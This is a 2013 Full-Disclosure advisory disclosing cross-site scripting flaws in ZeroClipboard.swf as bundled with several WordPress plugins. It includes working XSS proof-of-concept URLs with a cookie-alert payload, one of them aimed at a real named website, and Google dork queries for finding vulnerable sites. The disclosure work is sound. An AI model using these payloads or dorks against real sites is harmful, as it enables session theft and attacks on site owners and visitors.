lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Message-ID: <00c901ce349b$cfec7b00$9b7a6fd5@pc>
Date: Mon, 8 Apr 2013 23:57:24 +0300
From: "MustLive" <mustlive@...security.com.ua>
To: <submissions@...ketstormsecurity.org>, <full-disclosure@...ts.grok.org.uk>,
 "1337 Exploit DataBase" <mr.inj3ct0r@...il.com>
Subject: XSS vulnerabilities in ZeroClipboard in multiple
	plugins for WordPress

Hello list!

These are Cross-Site Scripting vulnerabilities in multiple plugins for 
WordPress (with ZeroClipboard.swf).

Earlier I've wrote about Cross-Site Scripting vulnerabilities in 
ZeroClipboard (http://seclists.org/fulldisclosure/2013/Feb/103). I wrote 
that this is very widespread flash-file and it's placed at tens of thousands 
of web sites. And it's used in hundreds of web applications.

After publishing this and two other advisories related to ZeroClipboard in 
February, I've published last month two new advisories (which I prepared in 
February). About vulnerabilities in WP plugins and in WP themes (with 
ZeroClipboard.swf).

This flash-file is used potentially in hundreds of plugins for WordPress. 
Among them are Flash Gallery, Slidedeck2, WPClone, PayPal Digital Goods 
powered by Cleeng and Cleeng Content Monetization. And there are many other 
vulnerable plugins for WP with ZeroClipboard.

After February's publications I've made a pause, and meanwhile Henri Salo 
disclosed in Match multiple vulnerable WordPress plugins with this 
flash-file (http://seclists.org/oss-sec/2013/q1/613). This list contains 
many plugins, but this is not exhaustive list and I've found many other 
vulnerable plugins with ZeroClipboard (including those, which I mentioned 
bellow).

SecurityVulns ID: 12910
CVE: CVE-2013-1808

-------------------------
Affected products:
-------------------------

Vulnerable are the next web applications (WordPress plugins) with 
ZeroClipboard (checked in mentioned versions):

Flash Gallery 1.7.2, Slidedeck2 (all Lite, Personal and Pro versions, fixed 
in version 2.1.20130306), WPClone 2.0.6, PayPal Digital Goods powered by 
Cleeng 2.2.4, Cleeng Content Monetization 2.3.2.

Both XSS vulnerabilities in ZeroClipboard are fixed in the last version 
ZeroClipboard 1.1.7. All developers should update swf-file in their 
software. I wrote about developers who begun fixing these vulnerabilities in 
ZeroClipboard in their software 
(http://seclists.org/fulldisclosure/2013/Mar/207).

----------
Details:
----------

Cross-Site Scripting (WASC-08):

XSS via id parameter and XSS via copying payload into buffer (as described 
in previous advisory).

1 Flash Gallery:

http://site/wp-content/plugins/1-flash-gallery/swf/ZeroClipboard.swf?id=%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height

Slidedeck2 (all Lite, Personal and Pro versions):

The folder of the plugin can be called slidedeck2, slidedeck-2.0, 
slidedeck2-personal and slidedeck2-pro. It contains the files 
ZeroClipboard.swf and ZeroClipboard10.swf.

http://site/wp-content/plugins/slidedeck2/js/zeroclipboard/ZeroClipboard.swf?id=%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height

http://site/wp-content/plugins/slidedeck2/js/zeroclipboard/ZeroClipboard10.swf?id=%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height

WPClone:

http://site/wp-content/plugins/wpclone/lib/js/ZeroClipboard.swf?i?id=%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height

PayPal Digital Goods powered by Cleeng:

http://site/wp-content/plugins/paypal-digital-goods-monetization-powered-by-cleeng/js/ZeroClipboard.swf?id=%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height

Cleeng Content Monetization:

http://www.drchloecarmichael.com/wp-content/plugins/cleeng/js/ZeroClipboard.swf?id=%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height

This is very widespread flash-file (both versions), as you can find out via 
Google dorks. If at searching by standard Goolge dork it's possible to find 
tens thousand of sites with ZeroClipboard.swf or ZeroClipboard10.swf, then 
at searching for plugins for WordPress it's possible to find hundreds 
thousand of sites with these flash-files.

inurl:zeroclipboard.swf inurl:/wp-content/plugins/ - about 224000 (in 
February, now more)
zeroclipboard.swf inurl:/wp-content/plugins/ - about 338000 (in February, 
now more)

------------
Timeline:
------------ 

2013.02.19 - after contacting with old and new developers of ZeroClipboard, 
I disclosed vulnerabilities in ZeroClipboard to the lists.
2013.02 - in February I wrote two additional advisories about 
vulnerabilities in different web applications with ZeroClipboard to draw 
more attention to this issue concerned with hundreds of web applications.
2013.03.15 - disclosed vulnerabilities in multiple plugins for WordPress at 
my site (http://websecurity.com.ua/6382/).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua 


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ